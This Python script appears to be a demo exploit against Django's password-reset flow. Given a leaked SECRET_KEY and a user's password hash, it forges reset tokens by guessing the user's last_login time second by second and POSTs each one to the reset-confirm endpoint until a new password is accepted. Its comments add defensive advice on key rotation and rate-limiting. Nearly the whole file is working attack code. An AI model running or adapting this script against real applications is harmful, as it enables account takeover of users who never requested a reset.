# coding: utf8
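# Demo of a Django password-reset token brute-force exploit. It depends on the
# application's SECRET_KEY and the target user's password hash already being known.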
from PasswordResetTokenGenerator import PasswordResetTokenGenerator
from django.utils.encoding import force_bytes, force_text
from django.utils.http import base36_to_int, int_to_base36, urlsafe_base64_encode, urlsafe_base64_decode
from datetime import date, datetime
import time
import requests
if __name__ == "__main__":
    # What this demo shows: the reset token is derived from values held by the
    # server (the signing key, the user's password hash, primary key and
    # last_login). With the key and the hash filled in below, the only value
    # the loop has to guess is last_login, which it steps back one second per
    # request from the moment the script started.
    #
    # Defender's reading: a disclosed SECRET_KEY has to be rotated like any
    # other leaked credential, and the confirm endpoint is worth rate-limiting
    # and alerting on, since this traffic is a long run of POSTs for a single
    # uid with a different token on every request.
    #
    # NOTE(review): PasswordResetTokenGenerator is imported from a local module
    # and takes the key as a constructor argument; presumably it mirrors
    # Django's generator, but its code is not visible here.
    HASHED_PASS = "pbkdf2_sha256$100000$**************************************************"
    SECRET_KEY = '*************************************'
    HOME_URL = "localhost:8000"
    RESET_TOKEN_URL = "localhost:8000/account/password_reset_confirm/"
    PK = 42

    # One session for the whole run so the CSRF cookie set by the first GET is
    # sent back with every POST.
    session = requests.Session()
    session.get(HOME_URL)
    form = {
        'csrfmiddlewaretoken': session.cookies['csrftoken'],
        'new_password1': 'michelmichel',
        'new_password2': 'michelmichel',
    }

    start_attack_timestamp = time.time()
    seconds_back = 0

    class User:
        """Stand-in carrying only the three attributes assigned below."""

        def __init__(self):
            self.password = HASHED_PASS
            self.pk = PK
            # Candidate last_login: script start time minus the current offset.
            self.last_login = datetime.fromtimestamp(
                start_attack_timestamp - seconds_back
            )

    while True:
        print("{}/? : {} hours scanned".format(seconds_back, seconds_back / 3600))

        candidate = User()
        uid = force_text(urlsafe_base64_encode(force_bytes(candidate.pk)))
        token = PasswordResetTokenGenerator(SECRET_KEY).make_token(candidate)
        url = RESET_TOKEN_URL + "{}/{}/".format(uid, token)

        page = session.post(url, data=form).text
        # The "Confirm your new password .. " page is what comes back while the
        # token is still being rejected; its absence is read as success.
        if "Confirm" not in page:
            print("Done : Password reset")
            break

        seconds_back += 1